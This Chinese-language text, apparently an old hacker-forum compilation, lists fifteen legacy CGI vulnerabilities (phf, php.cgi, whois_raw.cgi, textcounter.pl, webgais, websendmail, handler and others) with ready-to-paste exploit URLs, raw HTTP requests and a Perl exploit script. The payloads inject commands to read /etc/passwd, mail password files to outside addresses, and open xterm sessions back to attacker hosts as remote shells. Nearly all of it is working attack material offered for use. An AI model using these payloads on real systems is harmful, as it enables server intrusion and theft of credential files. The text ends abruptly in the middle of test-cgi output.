 |
| CGI漏洞集锦 |
| 一.phf漏洞 这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd: lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 但是我们还能找到它吗? 二.php.cgi 2.0beta10或更早版本的漏洞 可以读nobody权限的所有文件. lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd /etc/security/passwd等. 三.whois_raw.cgi lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0 四.faxsurvey lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 五.textcounter.pl 如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令. #!/usr/bin/perl $URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this $EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this if ($ARGV[0]) { $CMD=$ARGV[0];}else{ $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one"; }$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\n"; system({"wget"} "wget", $text, "-O/dev/null"); system({"wget"} "wget", $text, "-O/dev/null"); #system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx #system({"lynx"} "lynx", $text); 六.一些版本(1.1)的info2www的漏洞 $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)' $ You have new mail. $ 说实在我不太明白.:( 七.pfdispaly.cgi lynx -source \ 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd' pfdisplay.cgi还有另外一个漏洞可以执行命令 lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' or lynx -dump \ http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|' 八.wrap lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc 九.www-sql 可以让你读一些受限制的页面如: 在你的浏览器里输入:http://your.server/protected/something.html: 被要求输入帐号和口令.而有www-sql就不必了: http://your.server/cgi-bin/www-sql/protected/something.html: 十.view-source lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd 十一.campas lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a 十二.webgais telnet www.victim.com 80 POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 (replace this with the actual length of the "exploit"line) query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph 十三.websendmail telnet www.victim.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90) receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a 十四.handler telnet www.victim.com 80 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0 or GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download or GET /cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab>/bin/sh|<tab>?data=Download 注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令. 十五.test-cgi lynx http://www.victim.com/cgi-bin/test-cgi?\whatever CGI/1.0 test script report: argc is 0. argv is . SERVER_SOFTWARE = NCSA/1.4B SERVER_NAME = victim.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/1.0 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /cgi-bin/ |
|